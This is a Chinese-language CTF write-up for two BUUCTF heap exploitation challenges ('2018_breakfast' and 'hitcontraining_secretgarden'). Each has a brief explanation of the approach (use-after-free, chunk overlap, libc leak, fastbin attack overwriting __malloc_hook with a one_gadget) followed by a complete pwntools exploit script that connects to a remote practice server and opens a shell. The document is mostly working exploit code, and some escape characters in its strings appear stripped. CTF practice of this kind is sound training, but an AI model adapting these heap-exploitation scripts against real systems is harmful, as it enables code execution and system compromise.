铁人三项(第五赛区)_2018_breakfast
有uaf,先overlap之后leak libc,再fast bin attack,自己审题没有认真(没必要overlap,由于write和read不是同一个指针,所以直接写got表内容即可完成)
from pwn import * #p=process('./2018_breakfast') p=remote('node3.buuoj.cn',29005) libc=ELF('../libc-2.27.so') context.log_level='debug' def add(idx,size): p.recvuntil('5.- Exit') p.sendline('1') p.recvuntil('breakfast') p.sendline(str(idx)) p.recvuntil('kcal.') p.sendline(str(size)) def edit(idx,content): p.recvuntil('5.- Exit') p.sendline('2') p.recvuntil('ingredients') p.sendline(str(idx)) p.recvuntil('ingredients') p.send(content) def show(idx): p.recvuntil('5.- Exit') p.sendline('3') p.recvuntil('see') p.sendline(str(idx)) def delete(idx): p.recvuntil('5.- Exit') p.sendline('4') p.recvuntil('delete') p.sendline(str(idx)) add(0,0x70)#0 add(1,0x70) add(2,0x70) add(3,0x70) add(4,0x70) add(5,0x70) add(6,0x70) add(7,0x70) add(8,0x70) add(9,0x70) add(10,0x70) edit(0,b'p'*0x10+p64(0)+p64(0x81)) delete(1) delete(0) edit(0,'x80') add(0,0x70) add(11,0x70) edit(11,b'p'*0x58+p64(0x481)) delete(1) show(1) libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-96-0x20-libc.symbols['__malloc_hook'] print(hex(libc.address)) onegadget=[0x4f2c5,0x4f322,0x10a38c] one=libc.address+onegadget[2] malloc_hook=libc.symbols['__malloc_hook'] add(4,0x68) add(5,0x68) delete(4) delete(5) edit(5,p64(malloc_hook-0x3)) add(4,0x68) add(4,0x68) edit(4,b'ppp'+p64(one)) add(5,0x20) #gdb.attach(p) p.interactive()
hitcontraining_secretgarden
- leak libc:malloc一个unsorted bin然后覆盖前8个字节,进行show
- getshell:fastbin attack,然后system即可
from pwn import * #p=process('./secretgarden') p=remote('node3.buuoj.cn',25602) def add(size,name,content): p.recvuntil('choice : ') p.sendline('1') p.recvuntil('name :') p.sendline(str(size)) p.recvuntil('flower :') p.sendline(name) p.recvuntil('flower :') p.sendline(content) def delete(idx): p.recvuntil('choice :') p.sendline('3') p.recvuntil('garden:') p.sendline(str(idx)) def show(): p.recvuntil('choice :') p.sendline('2') def clean(): p.recvuntil('choice :') p.sendline(str(4)) elf=ELF('./secretgarden') libc=ELF('../libc-2.23.so') add(0x90,'pppp','pppp') add(0x68,'pppp','pppp') delete(0) add(0x68,'pppppppp','x10') show() libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-0xa+0x10-libc.symbols['__malloc_hook'] print(hex(libc.address)) delete(1) delete(2) delete(1) realloc = libc.symbols['__libc_realloc'] one_gadget = 0x4526a + libc.address malloc_hook=libc.symbols['__malloc_hook'] add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23)) add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23)) add(0x68, p64(malloc_hook-0x23), p64(malloc_hook-0x23)) add(0x68,b'A'*0x13+p64(0x400c5e),'a ') p.interactive()